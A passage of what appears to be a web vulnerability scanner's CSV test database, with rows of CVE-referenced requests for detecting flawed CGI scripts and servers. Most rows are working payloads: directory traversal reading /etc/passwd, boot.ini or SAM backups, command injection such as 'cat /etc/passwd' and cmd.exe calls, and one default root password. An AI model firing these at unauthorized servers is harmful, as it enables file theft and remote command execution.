on the server by requesting it check all .exe's","","" "000484","https://raw.githubusercontent.com/sullo/advisory-archives/master/phenoelit.de_dp-300.txt","6","/Config1.htm","GET","200","","","","","This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested.","","" "000485","MS02-018","6","/contents/extensions/asp/1","GET","200","","","","","The IIS system may be vulnerable to a DOS.","","" "000486","CVE-2005-1247","6","/WebAdmin.dll?View=Logon","GET","200","","","","","Some versions of WebAdmin are vulnerable to a remote DoS (not tested).","","" "000487","CVE-2002-0128","6","@CGIDIRSPbcgi.exe?bcgiu4","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000488","CVE-2002-0128","6","@CGIDIRStestcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.","","" "000489","CVE-2002-0128","6","/cgi-win/cgitest.exe","GET","200","","","","","This CGI may allow the server to be crashed remotely.","","" "000490","","7","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","GET","root:","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000491","","8","/c/winnt/system32/cmd.exe?/c+dir+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","","" "000492","","8","@CGIDIRSsnorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000493","","8","@CGIDIRSsnorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","","" "000494","","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","\[winnt\]","","","Internal server error","","Can issue arbitrary commands to host.","","" "000495","","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The parameter is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","","" "000496","http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server.","","" "000497","","b","/JUNK(10)","GET","SecureIIS application","","","","","Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.","","" "000498","","b","/somethingnotthere.ida","GET","Rejected-By-UrlScan","","","","","The IIS server is running UrlScan","","" "000501","","d","/cgi-shl/win-c-sample.exe","GET","200","","","","","win-c-sample.exe has a buffer overflow","","" "000502","CVE-2002-2006","34","/examples/servlet/TroubleShooter","GET","TroubleShooter Servlet Output","","","","","Tomcat default JSP page reveals system information and may be vulnerable to XSS.","","" "000503","CVE-2002-0307","8","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely.","","" "000504","CVE-2002-0307","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid=","","","","","Avenger's News System allows commands to be issued remotely.","","" "000505","","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","","" "000506","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%2f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000507","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000508","https://securiteam.com/exploits/5HP0M2A60G","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits.","","" "000509","","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000510","","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","","" "000511","","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","","" "000512","MS01-033","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000513","MS01-033","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000514","MS01-033","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000515","MS01-033","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server.","","" "000516","CVE-2000-0097","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[fonts\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000517","CVE-2000-0097","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[windows\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","","" "000518","","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters. At worst, IIS, not PWS, should be used.","","" "000519","","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000520","","5","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","","" "000521","","5","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files.","","" "000522","CVE-2002-0262","5","/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini","GET","boot loader","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000523","CVE-2002-0262","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","","" "000524","","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","","" "000525","https://www.exploit-db.com/exploits/22336","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot\.ini","","","","","PHP Ping allows commands to be executed on the remote host.","","" "000526","CVE-2002-1483","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","","" "000527","","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","","" "000528","CVE-2003-1345","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","","" "000529","","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv\.conf","","","","","This CGI allows attackers to view arbitrary files on the host.","","" "000530","","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","","" "000531","CVE-2001-1458","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","\[boot loader\]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000532","CVE-2002-0466","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000533","CVE-2002-0466","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","","" "000534","","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000535","","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","","" "000536","","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000537","","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000538","","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","","" "000539","","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly.","","" "000540","","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","","" "000541","","5","/../../../../winnt/repair/sam._","GET","200","","","Forbidden","","Sam backup successfully retrieved.","","" "000542","","5","/..\\..\\..\\..\\..\\..\\..\\boot.ini","GET","boot loader","","","","","It is possible to read files on the server by adding /../ in front of file name.","","" "000543","","5","///etc/passwd","GET","root:","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000544","","5","///etc/hosts","GET","127\.0\.0\.1","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","","" "000545","CVE-2002-0784","5","////./../.../boot.ini","GET","boot loader","","","","","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de.","","" "000546","CVE-2000-0234","5","/.cobalt/sysManage/../admin/.htaccess","GET","AuthName","","","","","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.","","" "000547","","5","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","GET","root:","","","","","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retrieval. The product is no longer maintained and should be replaced.","","" "000548","CVE-2003-0294","5","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","GET","root:","","","","","php-proxima 6.0 and below allows arbitrary files to be retrieved.","","" "000549","OSVDB-49354","5","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","GET","root:","","","","","AtomicBoard v0.6.2 allows remote users to read arbitrary files.","","" "000550","OSVDB-54099","5","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000551","BID-6595,https://vulners.com/osvdb/OSVDB:3012","5","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","","" "000552","https://seclists.org/bugtraq/2003/Feb/382","5","@TYPO3typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","GET","root:","","","","","TYPO3 allows any file to be retrieved remotely. Upgrade to the latest version.","","" "000553","","5","/DomainFiles/*//../../../../../../../../../../etc/passwd","GET","root:","","","","","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.","","" "000554","CVE-2002-0879","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","","" "000555","OSVDB-59600","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","","" "000556","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/winnt/win.ini","GET","\[fonts\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000557","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/windows/win.ini","GET","\[windows\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000558","https://vulners.com/osvdb/OSVDB:2870","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","","" "000559","OSVDB-59085","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000560","","5","/index.php?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000561","","5","/index.php?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","","" "000562","OSVDB-59085","5","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","","" "000563","","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","GET","root:","","","","","Default JRun CGI lets users read any system file.","","" "000564","","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","GET","boot loader","","","","","Default JRun CGI lets users read any system file.","","" "000565","OSVDB-51750","5","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","GET","root:","","","","","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.","","" "000566","","5","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","GET","root:","","","","","nCUBE Server Manage 1.0 allows any file to be read on the remote system.","","" "000567","","5","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","GET","passwd","","","","","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.","","" "000568","","5","/phprocketaddin/?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" "000569","OSVDB-2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd","GET","root:","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000570","OSVDB-2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc","GET","passwd","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","","" "000571","","5","/phptonuke.php?filnavn=/etc/passwd","GET","root:","","","","","Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.","","" "000572","","5","/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd","GET","root:","","","","","NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.","","" "000573","CVE-2001-0215","5","/ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000574","","5","/support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000575","","5","/viewpage.php?file=/etc/passwd","GET","root:","","","","","PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.","","" "000576","CVE-2000-1005","5","/Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.","","" "000577","CVE-2002-0926 http://www.wolfram.com","5","/webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif","GET","boot loader","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.","","" "000578","CVE-2002-0926 http://www.wolfram.com","5","/webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif","GET","root:","","","","","Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version.","","" "000579","CVE-2002-0277","5","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","GET","root:","","","","","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved.","","" "000580","","5","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000581","","5","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000582","CVE-2001-0593","5","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files from the server.","","" "000583","","5","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","GET","root:","","","","","The CGI allows attackers to read arbitrary files remotely.","","" "000584","","5","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000585","","5","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system.","","" "000586","","5","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000587","","5","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files.","","" "000588","","5","@CGIDIRScommon.php?f=0&ForumLang=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read files on the host.","","" "000589","","5","@CGIDIRScommerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000590","","5","@CGIDIRScgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000591","","5","@CGIDIRScal_make.pl?p0=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000592","","5","@CGIDIRSdb4web_c/dbdirname//etc/passwd","GET","root:","","","","","The passwd file was retrieved by using the db4web executable.","","" "000593","CVE-2001-0780","5","@CGIDIRSdirectorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the server.","","" "000594","CVE-2002-0531","5","@CGIDIRSemumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000595","CVE-2002-0531","5","@CGIDIRSemumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000596","CVE-2002-0531","5","@CGIDIRSemu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000597","","5","@CGIDIRSfaxsurvey?cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to execute commands and read files remotely.","","" "000598","CVE-2002-2033","5","@CGIDIRSfaqmanager.cgi?toc=/etc/passwd%00","GET","root:","","","","","FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version.","","" "000599","CVE-2000-0188","5","@CGIDIRSezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1","GET","root:","","","","","EZShopper search CGI allows arbitrary files to be read","","" "000600","","5","@CGIDIRSformmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000601","","5","@CGIDIRSformmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test","GET","root:","","","","","This CGI allows attackers to retrieve arbitrary files from the server.","","" "000602","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1","GET","\[fonts\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000603","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1","GET","\[windows\]","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000604","CVE-2001-1115","5","@CGIDIRSgenerate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1","GET","root:","","","","","This CGI from SIX webboard allows attackers read arbitrary files on the host.","","" "000605","","5","@CGIDIRShtmlscript?../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000606","","5","@CGIDIRShtgrep?file=index.html&hdr=/etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000607","","5","@CGIDIRShsx.cgi?show=../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000608","","5","@CGIDIRSsewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd","GET","root:","","","","","Default scripts can allow arbitrary access to the host.","","" "000609","CVE-2003-0756","5","@CGIDIRSsbcgi/sitebuilder.cgi","GET","200","","","","","SITEBUILDER v1.4 may allow retrieval of any file. With a valid username and password, request: //sbcgi/sitebuilder.cgi?username=&password=&selectedpage=../../../../../../../../../../etc/passwd","","" "000610","","5","@CGIDIRSmrtg.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000611","","5","@CGIDIRSmrtg.cfg?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000612","","5","@CGIDIRSmain.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000613","CVE-2002-1581","5","@CGIDIRSmail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00","GET","root:","","","","","MailReader.com v2.3.31 web package allows remote users to retrieve any system file.","","" "000614","CVE-2002-0531","5","@CGIDIRSmail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000615","","5","@CGIDIRSloadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[windows\]","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000616","","5","@CGIDIRSloadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host.","","" "000617","CVE-2000-0208","5","@CGIDIRShtsearch?exclude=%60/etc/passwd%60","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000618","","5","@CGIDIRSshop.cgi?page=../../../../../../../etc/passwd","GET","root:","","","","","Remote file read retrieval.","","" "000619","","5","@CGIDIRSsendtemp.pl?templ=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000620","","5","@CGIDIRSsearch/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc","GET","resolv\.conf","","","","","It is possible to read files on the remote server, this CGI should be removed.","","" "000621","CVE-2001-0215","5","@CGIDIRSsearch.pl?form=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The ROADS search.pl allows attackers to retrieve system files.","","" "000622","","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini","GET","\[fonts\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000623","","5","@CGIDIRSsearch.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini","GET","\[windows\]","","","","","This CGI contains a well known vuln that allows attackers to read any system file.","","" "000624","","5","@CGIDIRSquickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the remote system.","","" "000625","","5","@CGIDIRSpublisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10","GET","root:","","","","","AHG's search.cgi allows any command to be executed. www.ahg.com.","","" "000626","","5","@CGIDIRSphp.cgi?/etc/passwd","GET","root:","","","","","This allows attackers to read arbitrary files on the system and perhaps execute commands.","","" "000627","","5","@CGIDIRSpals-cgi?palsAction=restart&documentName=/etc/passwd","GET","root:","","","","","This CGI allows remote users to read system files.","","" "000628","","5","@CGIDIRSopendir.php?/etc/passwd","GET","root:","","","","","This CGI allows attackers to read any file on the web server.","","" "000629","CVE-2002-0531","5","@CGIDIRSnph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","EmuMail allows any file to be retrieved from the remote system.","","" "000630","CVE-2001-0231","5","@CGIDIRSnewsdesk.cgi?t=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000631","CVE-2000-0782","5","@CGIDIRSnetauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to view arbitrary files on the server.","","" "000632","CVE-2000-0912,http://www.packetstormsecurity.org/0009-exploits/multihtml.c","5","@CGIDIRSmultihtml.pl?multi=/etc/passwd%00html","GET","root:","","","","","This CGI allows attackers to read arbitrary files on the host. May also allow a shell to be spawned.","","" "000633","CVE-1999-0039","5","@CGIDIRSwebdist.cgi?distloc=;cat%20/etc/passwd","GET","root:","","","","","This CGI allows attackers to read files remotely.","","" "000634","CVE-2001-0214","5","@CGIDIRSway-board/way-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000635","CVE-2001-0214","5","@CGIDIRSway-board.cgi?db=/etc/passwd%00","GET","root:","","","","","Allows attackers to read arbitrary files from the server.","","" "000637","","5","@CGIDIRSviewsource?/etc/passwd","GET","root:","","","","","Allows attacker to retrieve arbitrary files. Remove from CGI directory.","","" "000638","","5","@CGIDIRSttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd","GET","root:","","","","","Tarantell TTAWeb Top CGI lets remote users read arbitrary files.","","" "000639","","5","@CGIDIRStraffic.cgi?cfg=../../../../../../../../etc/passwd","GET","root:","","","","","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version.","","" "000640","","5","@CGIDIRStechnote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000641","CVE-2001-0420","5","@CGIDIRStalkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1","GET","root:","","","","","Talkback CGI displays arbitrary files","","" "000642","CVE-2001-0804","5","@CGIDIRSstory/story.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000643","CVE-2001-0804","5","@CGIDIRSstory.pl?next=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","story.pl versions older than 1.4 allow any file to be read remotely.","","" "000644","","5","@CGIDIRSstore/index.cgi?page=../../../../../../../../etc/passwd","GET","root:","","","","","CommerceSQL allows reading of arbitrary files. Default login/pass is username/password.","","" "000645","","5","@CGIDIRSstore.cgi?StartID=../../../../../../../../../../etc/passwd%00.html","GET","root:","","","","","This CGI allows attackers to read arbitrary files remotely.","","" "000646","","5","@CGIDIRSssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd","GET","root:","","","","","The server install allows reading of any system file by sending encoded '../' directives.","","" "000647","CVE-2000-0180","5","@CGIDIRSsojourn.cgi?cat=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows attackers to read arbitrary files.","","" "000648","","5","@CGIDIRSsimple/view_page?mv_arg=|cat%20/etc/passwd|","GET","root:","","","","","This CGI allows attackers to execute commands on the host as the HTTP daemon owner.","","" "000649","CVE-2000-0922","5","@CGIDIRSshopper.cgi?newpage=../../../../../../../../../../etc/passwd","GET","root:","","","","","Versions 1 and 2 of Byte's Interactive Web Shopper allow attackers to read files remotely. Uncomment the #$debug=1 variable.","","" "000650","CVE-2001-1458","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","","" "000651","","5","/webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd","GET","root:","","","","","Webcalendar 0.9.41 and below allow remote users to read arbitrary files.","","" 